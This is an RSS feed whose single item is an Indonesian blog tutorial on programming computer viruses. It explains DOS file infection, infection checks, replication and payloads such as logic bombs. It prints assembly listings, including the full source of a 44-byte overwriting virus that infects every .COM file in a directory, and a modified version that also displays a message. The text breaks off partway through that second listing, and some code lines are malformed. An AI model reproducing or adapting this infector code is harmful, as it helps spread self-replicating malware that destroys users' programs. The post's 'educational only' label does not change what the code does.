<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <atom:link href="http://barcafireball354.yolasite.com/blog/blog.rss" rel="self" type="application/rss+xml" />
        <title>blog</title>
        <description>blog</description>
        <link>http://barcafireball354.yolasite.com/blog/blog.php</link>
        <lastBuildDate>Wed, 17 Jun 2026 07:55:09 +0100</lastBuildDate>
        <generator>FeedCreator 1.7.2</generator>
        <item>
            <title>Pemrograman Virus Komputer</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/pemrograman-virus-komputer-aug-21-2011-2-10-23-am-23</link>
            <description>&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;center&quot;&gt;&lt;span style=&quot;color: #000099;&quot;&gt;PEMPROGRAMAN VIRUS KOMPUTER&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;4. 1. Cara Kerja Virus Komputer&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Cara kerja Virus Komputer pada umumnya adalah 
menyebarkan dirinya dengan cara antara lain menularkan file-file 
executable atau file-file yang bisa dijalankan langsung dari DOS Command
 line . Untuk memperjelas mekanisme penyebaran di ilustrasikan pada 
gambar dibawah ini :&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe1.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;239&quot; width=&quot;264&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;center&quot;&gt;Gambar 4.1. Mekanisme Penularan&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Sudah jadi sifat virus jika dia dijalankan, maka ia 
menulari program aplikasi yang lain, yang di maksud menulari adalah 
menyalin dirinya atau program virus tersebut ke program aplikasi 
lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka
 apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1
 yang sudah serinfeksi virus itu akan menularkan virus pada program 
aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah 
merupakan program pemikul bagi virus itu sendiri, yang akan menularkan 
seluruh program aplikasi yang ada.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Agar bisa bertindak sebagai virus komputer, sebuah 
program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari 
virus komputer. Kelima kemampuan itu adalah :&lt;/p&gt;
&lt;ol&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan mendapatkan informasi&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan memeriksa program&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan menggandakan diri / menularkan&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan mengadakan manipulasi&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan menyembunyikan diri sendiri&lt;/p&gt;
&lt;/li&gt;&lt;/ol&gt;
&lt;p align=&quot;justify&quot;&gt;Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;justify&quot;&gt;4. 1.1. Kemampuan mendapatkan Informasi&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Pada Virus Komputer kemampuan untuk mendapatkan 
informasi sangat penting, terutama informasi mengenai file yang akan 
diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi 
sekumpulan program, contohnya File-file EXE, file-file COM, atau 
kedua-duanya, virus harus mendapatkan informasi tentang file tersebut 
pada directory, hal-hal mengenai informasi pada file yang perlu 
diketahui antara lain :&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;1. Apakah Extensi File tersebut ( COM,EXE, BAT)&lt;br&gt;
2. Apa Atribut file ( Hidden, Readonly, Archive)&lt;br&gt;
3. Besar File Yang akan Di infeksi&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Informasi tersebut sangat bermanfaat bagi virus, 
dimana informasi mengenai Extension file berguna untuk virus yang 
menyerang file-file tertentu contohnya virus yang menyerang file EXE, 
virus tersebut harus mencari file-file EXE yang akan ditulari.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Informasi attribut berguna untuk memberikan pilihan 
pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden 
ataukan virus harus mengeset attribut file-file tersebut menjadi Normal,
 sehingga virus dapat menulari.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;/em&gt;&lt;/p&gt;&lt;em&gt;
&lt;p align=&quot;justify&quot;&gt;Besar_file_terinfeksi = file_asli + Virus_size&lt;/p&gt;
&lt;/em&gt;&lt;p&gt;&lt;em&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Fungsi ini terutama dipakai oleh virus Non 
OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan 
informasi tentang File :&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh&lt;br&gt;
Mov cx, 3 ; Attribut File&amp;nbsp;&amp;nbsp;&amp;nbsp; ; cari host file&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;———&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
cmp ax,12h&amp;nbsp; ; Ada file lagi&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;je exit&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; kalau tidak ada exit&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;———&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;file_to_infect db “*.COM” ; File yang akan diinfeksi&lt;br&gt;
ends start&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; akhir kode Virus&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;center&quot;&gt;Listing 4.1. Search First File&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;em&gt;Interupt&lt;/em&gt; 21H&lt;/span&gt; dengan &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;em&gt;Service &lt;/em&gt;ah, 4EH&lt;/span&gt; yang berguna untuk mencari file pertama yang cocok dengan DX ( &lt;em&gt;Find First Matching File&lt;/em&gt;),
 dan mendapat kan informasi tentang file yang berada di dalam directory,
 biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi 
untuk mencari file berikutnya yang cocok ( &lt;em&gt;Find Next Maching File&lt;/em&gt;), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah &lt;em&gt;Hidden, ReadOnly&lt;/em&gt;, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;justify&quot;&gt;4. 1. 2. Kemampuan Untuk Memeriksa Program&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan untuk memeriksa program sangat penting bagi
 Virus Komputer , karena untuk mengetahui apakah file target sudah 
tertular atau belum, ini sangat penting karena virus tidak akan 
menularkan dirinya berkali-kali pada file yang sama, selain untuk 
mempercepat proses penularan juga untuk menjaga agar file korban tidak 
rusak, karena apabila penularan dilakukan berulang-ulang pada file yang 
sama, CRC dari file tersebut akan kacau dan menyebabkan file yang 
tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan 
pesan &lt;em&gt;Divide Over Flow, atau Error in Exe File,&lt;/em&gt; selain itu file
 yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan 
pemakai komputer. Seperti digambarkan dalam flowchart berikut ini :&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe2.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;664&quot; width=&quot;372&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;center&quot;&gt;Gambar 4.2. Memeriksa Program&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;Berikut ini contoh listing dari kemampuan untuk memeriksa file&lt;/p&gt;
&lt;blockquote&gt;
&lt;blockquote&gt;&lt;p&gt;&lt;span style=&quot;font-family: Arial; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;Mov ah,     3fh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Baca file&lt;br&gt;
Mov cx, 3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; baca 3 byte&lt;br&gt;
Mov dx,3_byte&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; simpan pada buffer&lt;br&gt;
Add dx,si&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Nama file&lt;br&gt;
Int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos     intrupt&lt;br&gt;
Cmp a,3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cek 3     byte tadi&lt;br&gt;
Jnz cari_lagi&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Jika sudah tertular exit&lt;br&gt;
Jmp Infect&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; kalau belum ,     infect_file&lt;br&gt;
3_byte equ $&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;data 3 byte pertama dari file     asli&lt;br&gt;
&lt;/span&gt; &lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt; &lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;;yang     belum tertular&lt;br&gt;
infect_file :&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; bagian penginfeksian&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;———— ; rutin infeksi&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;int 20h ; Dos Exit function&lt;br&gt;
nop ; No Operation&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt; &lt;/span&gt;&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;center&quot;&gt;Listing 4.2 . Periksa File&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Pada rutin diatas dapat dilihat bagai mana Virus 
Komputer memeriksa file korbannya, untuk memberikan identitas file mana 
yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file 
korban, umumnya 3 byte pertama yang menandakan file tersebut sudah 
tertular / belum, 3 byte pertama tersebut umumnya intruksi &lt;em&gt;JMP : offset&lt;/em&gt; (Untuk file COM) , kode &lt;em&gt;‘MZ’&lt;/em&gt; pada header file EXE dan PE untuk File Aplikasi Windows&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Rutin ini sangat penting untuk menghindari penularan 
berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin 
ini dipakai oleh 90 % virus komputer untuk menularkan diri.&lt;strong&gt;&lt;br&gt;
&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;strong&gt;4. 1. 3. Kemampuan untuk menggandakan diri / Replicating&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;kemampuan ini merupakan inti utama dari Virus 
Komputer , karena virus komputer memang diprogram untuk menularkan, dan 
memperbanyak dirinya. Tugas dari rutin replicating ini adalah 
menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin 
ini sangat berat karena rutin tersebut harus mampu menyebarkan virus 
dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin
 replicator harus dapat menjaga agar file yang ditularinnya tidak rusak (
 Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan 
sebagaimana mestinnya.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Cara kerja rutin replicator pada file COM lebih 
sederhana dari file EXE, karena struktur program EXE yang tidak terbatas
 besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya
 dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM 
akan menditeksi dan mengcopy byte pertama dari file yang akan 
ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan 
kedalam daerah lain dalam file.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe3.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;40&quot; width=&quot;347&quot;&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;File bersih&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; program Virus&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Pada diagram diatas P1 adalah bagian pertama dari 
file, P2 adalah bagian kedua dari file korban. P1 harus sama besar 
dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya 
pada bagian akhir dari file.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe5.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;40&quot; width=&quot;222&quot;&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Setelah itu virus akan mengcopykan bagian pertama 
dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi
 JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di 
belakang file korban.&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe6.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;40&quot; width=&quot;213&quot;&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Kemudian virus akan mengcopykan bagian kedunya (V2) 
yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya 
berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk 
melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat 
dibawah ini :&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;img src=&quot;http://indovirus.8m.com/IMAGES/wpe7.jpg&quot; alt=&quot;&quot; border=&quot;0&quot; height=&quot;40&quot; width=&quot;299&quot;&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Dalam program dapat diambil contoh 44-Virus.Com , 
yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting 
file Com yang ada dalam suatu directory sepanjang badan Virus itu 
sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum 
mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa 
program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah 
ini virus hanya mempunyai kemampuan untuk menulari file Com.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Berikut ini listing dari 44-Virus.Asm :&lt;/p&gt;
&lt;hr&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;virus segment&lt;br&gt;
org 100h ; file COM&lt;br&gt;
assume cs:virus&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;len equ offset last-100h ;Panjang virus = Akhir program – awal program&lt;br&gt;
start : mov ah,04eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cari file dengan kategori file COM&lt;br&gt;
xor cx,cx&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; cx 0, = hanya file dengan atrribut Normal&lt;br&gt;
lea dx,com_mask&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Nama file COM masukan ke register DX&lt;br&gt;
int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis&lt;br&gt;
mov dx,9eh&lt;br&gt;
Int 21h&lt;br&gt;
Infect : mov cx,len&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; cx diisi panjang badan virus&lt;br&gt;
lea dx,start&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Masukan header Virus &lt;em&gt;“V1″&lt;/em&gt; pada DX&lt;br&gt;
Mov ah,40h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Tulis badan virus dalam file korban&lt;br&gt;
Int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
Next : mov ah,3eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Tutup file korban&lt;br&gt;
int 21h&lt;br&gt;
mov ah,4fh&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cari file korban lagi&lt;br&gt;
int 21h&lt;br&gt;
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file&lt;br&gt;
&lt;/span&gt; &lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;; Kalau sudah semua terinfeksi Exit&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;com_mask: db “*.COM”,0 ; File dengan ekstensi Com&lt;br&gt;
last : db 090h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Akhir badan virus &lt;em&gt;“V2″&lt;br&gt;
&lt;/em&gt;virus ends&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;end start&lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt;
&lt;p align=&quot;center&quot;&gt;Listing 4.3. Replicating / Penggandaan&lt;/p&gt;
&lt;/span&gt;&lt;/strong&gt;&lt;p&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;&lt;strong&gt;4. 1. 4. Kemampuan Mengadakan Manipulasi&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Kemampuan untuk mengadakan manipulasi sangat penting 
dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus 
komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian 
manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, 
suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi 
ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, 
makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin 
besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang 
ada, yang sering digunakan adalah :&lt;/p&gt;
&lt;ol&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Menampilkan tulisan / kata-kata / gambar&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Membunyikan port speaker&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p align=&quot;justify&quot;&gt;Time bomb / logic Bomb&lt;/p&gt;
&lt;/li&gt;&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;justify&quot;&gt;4.1.4.1. Menampilkan Tulisan / gambar&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;Rutin ini yang paling banyak dipakai oleh pembuat 
Virus Komputer , karena rutin ini selain untuk kepopularitas virus 
maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para 
pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas 
tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan 
menarik. Listing program dibawah ini akan memberikan contoh pembuatan 
rutin ini.&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;&lt;br&gt;
&lt;/span&gt;&lt;/p&gt;&lt;hr&gt;
&lt;p align=&quot;justify&quot;&gt;virus segment&lt;br&gt;
org 100h&lt;br&gt;
assume cs:virus&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;len equ offset last-100h ; Panjang virus = Akhir program – awal program&lt;br&gt;
start : jmp mulai&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
msg db ‘ Modification of 44 Virus ‘,13,10&lt;br&gt;
db ‘ © 2000,iwing[indovirus] ’,13,10&lt;br&gt;
db ‘ – For Educational Only -$’,13,10&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
mulai : mov ah,09&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos service 09h = Cetak String&lt;br&gt;
lea dx,msg&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; dx berisi pesan yang akan dicetak&lt;br&gt;
int 21h ; Dos intrupt&lt;br&gt;
go : mov ah,04eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cari file dengan kategori file COM&lt;br&gt;
xor cx,cx&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; cx 0, = hanya file dengan atrribut Normal&lt;br&gt;
lea dx,com_mask&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Nama file COM masukan ke register DX&lt;br&gt;
int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis&lt;br&gt;
mov dx,9eh&lt;br&gt;
Int 21h&lt;br&gt;
infect : mov cx,len ; cx diisi panjang badan virus&lt;br&gt;
lea dx,start&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Masukan header Virus &lt;em&gt;“V1″&lt;/em&gt; pada DX&lt;br&gt;
mov ah,40h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Tulis badan virus dalam file korban&lt;br&gt;
Int 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Dos Intrupt&lt;br&gt;
Next : mov ah,3eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Tutup file korban&lt;br&gt;
int 21h&lt;br&gt;
